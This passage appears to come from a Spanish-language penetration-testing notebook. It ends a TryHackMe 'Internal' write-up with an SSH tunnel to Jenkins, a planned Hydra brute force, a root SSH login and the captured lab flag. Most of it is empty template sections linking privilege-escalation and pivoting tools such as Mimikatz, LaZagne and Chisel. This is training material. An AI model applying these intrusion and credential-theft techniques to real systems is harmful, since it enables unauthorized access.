  • CONCLUSION: CONSEGUIMOS TUNELIZAR GRACIAS AL PDF NUESTRO DE TUNELIZACION CON SSH Y COMO SABIEAMOS QUE TENIAMOS ESE SERVICIO LOCALMENTE DE JENKINS CORRIENDO EN LA ;MAQUIN AINTERNAL; DESDE NUESTRA MAQUINA ATACANTE CON SSH LOGRAMOS REALIZAR UNA TUNELIZACION DE SU LOCALHOST POR EL PUERTO 8080A NUESTRO PUERTO 8082 Y LOGRAMOS NTRAR AL PANEL DE LOGIN DE JENKINS VAMOS A PROBAR RAPIDO SI PODEMOS HACER FUERSZA BRUTA CON HYDRA y SI NO VEREMOS DE CONTINUES lUEGO, POR QUE POR EL MOMENTO NO TENEMOS MAS CREDENCIALES AUE ADMIN Y AUBREANNA..

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  ┌──(root㉿kali)-[~]
  └─# ssh root@10.10.112.117     
  root@10.10.112.117's password: 
  Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
  
   * Documentation:  https://help.ubuntu.com
   * Management:     https://landscape.canonical.com
   * Support:        https://ubuntu.com/advantage
  
    System information as of Wed Feb 28 21:47:51 UTC 2024
  
    System load:  0.0               Processes:              115
    Usage of /:   63.7% of 8.79GB   Users logged in:        0
    Memory usage: 38%               IP address for eth0:    10.10.112.117
    Swap usage:   0%                IP address for docker0: 172.17.0.1
  
    => There is 1 zombie process.
  
  
   * Canonical Livepatch is available for installation.
     - Reduce system reboots and improve kernel security. Activate at:
       https://ubuntu.com/livepatch
  
  0 packages can be updated.
  0 updates are security updates.
  
  Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
  
  
  Last login: Mon Aug  3 19:59:17 2020 from 10.6.2.56
  root@internal:~# ls
  root.txt  snap
  root@internal:~# whoami
  root
  root@internal:~# cat root.txt
  THM{d0ck3r_d3str0y3r}
  

  • CONCLUSION: PERFECTO SOMOS ROOT CON ESTAS CREDENCIALES QUE ENCONTRAMOS EN JENKINS Y NOS CONECTAMOS POR SSH, SE TENZO Y RESOLVIMOS LA MAQUINA ENCONTRANDO DE NUEVO LA BANDERA EN DIRECTORIO /OPT THM{d0ck3r_d3str0y3r}

---

---

⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔⛔

💠 ESCALADA DE PRIVILEGIOS WINDOWS ❌

ESCALADA DE PRIVILEGIOS WINDOWS

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• POWERUP👈 --------------------------------->https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• MIMIKATZ👈 --------------------------------->https://www.kali.org/tools/mimikatz/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• ROTTENPOTATO👈 --------------------------------->https://github.com/breenmachine/RottenPotatoNG

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WINDOWS EXPLOITS SUGGESTER👈 --------------------------------->https://github.com/AonCyberLabs/Windows-Exploit-Suggester

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• ACCESSCHK👈 --------------------------------->https://github.com/ankh2054/windows-pentest

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• PSEXEC👈 --------------------------------->https://learn.microsoft.com/en-us/sysinternals/downloads/psexec

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WINPEAS👈 --------------------------------->https://www.kali.org/tools/peass-ng/ --->https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• BLOODHOUND --------------------------------->https://github.com/BloodHoundAD/BloodHound

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CRACKMAPEXEC --------------------------------->https://www.kali.org/tools/crackmapexec/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• EMPIRE POWERSHELL Y LINUX👈 --------------------------------->https://www.kali.org/tools/powershell-empire/ -->https://github.com/EmpireProject/Empire

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LOLBAS👈 --------------------------------->https://lolbas-project.github.io/#

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WADCOMS comandos👈 --------------------------------->https://wadcoms.github.io/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HIJACKLIBS DLL👈 --------------------------------->https://hijacklibs.net/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• PRINTSPOOFER👈 --------------------------------->https://github.com/itm4n/PrintSpoofer

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• ROGUEWINRM👈 --------------------------------->https://github.com/antonioCoco/RogueWinRM

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• WINDOWSPRIVESC metodos👈 --------------------------------->https://github.com/debiantano/WindowsPrivesc

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• POWERSPLOIT👈 --------------------------------->https://www.kali.org/tools/powersploit/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• EVIL-WINRM👈 --------------------------------->https://www.kali.org/tools/evil-winrm/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

---

---

☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️☣️

🐧 ESCALADA DE PRIVILEGIOS LINUX ❌

ESCALADA DE PRIVILEGIOS LINUX

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LaZagne👈 --------------------------------->https://github.com/AlessandroZ/LaZagne--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• GTFObins👈 --------------------------------->https://gtfobins.github.io/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• GTFObins👈 --------------------------------->https://gtfobins.github.io/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• GTFObins👈 --------------------------------->https://gtfobins.github.io/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LINUX KERNEL CVEs👈 --------------------------------->https://www.linuxkernelcves.com/cves

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LINENUM👈 --------------------------------->https://github.com/rebootuser/LinEnum

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LINPEAS👈 --------------------------------->https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• ENUMERACION SMART LINUX👈 --------------------------------->https://github.com/diego-treitos/linux-smart-enumeration

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LINUXPRIVCHECKER👈 --------------------------------->https://github.com/sleventyeleven/linuxprivchecker

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LINUX EXPLOIT SUGGESTER👈 --------------------------------->https://github.com/The-Z-Labs/linux-exploit-suggester

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HACKTRICKS👈 --------------------------------->https://book.hacktricks.xyz/v/es/welcome/readme

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CHKROOTKIT👈 --------------------------------->https://github.com/Magentron/chkrootkit

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• LYNIS👈 --------------------------------->https://github.com/CISOfy/lynis

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• UNIX-PRIVESC-CHECK👈 --------------------------------->https://github.com/pentestmonkey/unix-privesc-check

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• DIRDTYCOW👈 --------------------------------->https://github.com/firefart/dirtycow

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• PRIV-ESCALATION metodos👈 --------------------------------->https://github.com/KevinLiebergen/priv-escalation

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• FILESEC GTFO win y linux👈 --------------------------------->https://filesec.io/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• RESPONDER👈 --------------------------------->https://www.kali.org/tools/responder/ -->https://github.com/SpiderLabs/Responder

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

---

---

☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️☢️

♻️ PIVOTING ❌

PIVOTING

• SSH TUNNELS👈 --------------------------------->https://www.openssh.com/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• PROXYCHAINS👈 --------------------------------->https://github.com/rofl0r/proxychains-ng

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SOCAT👈 --------------------------------->https://www.kali.org/tools/socat/--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NCAT👈 --------------------------------->https://nmap.org/ncat/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CHISEL👈 --------------------------------->https://github.com/jpillora/chisel--->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CORKSCREW👈 --------------------------------->https://github.com/bryanpkc/corkscrew

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METASPLOIT👈 --------------------------------->https://github.com/rapid7/metasploit-framework

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• METERPRETER👈 --------------------------------->https://www.metasploit.com/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• REGEORG👈 --------------------------------->https://github.com/sensepost/reGeorg

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• RPIVOT👈 --------------------------------->https://github.com/klsecservices/rpivot

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

---

---

💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀💀

MAPA MENTAL REALIZADO CON P4Informesmentales, mas al final docummentos adjuntos de el:

INTERNAL_P4Informemental (1)

INTERNAL_P4Informemental.pdf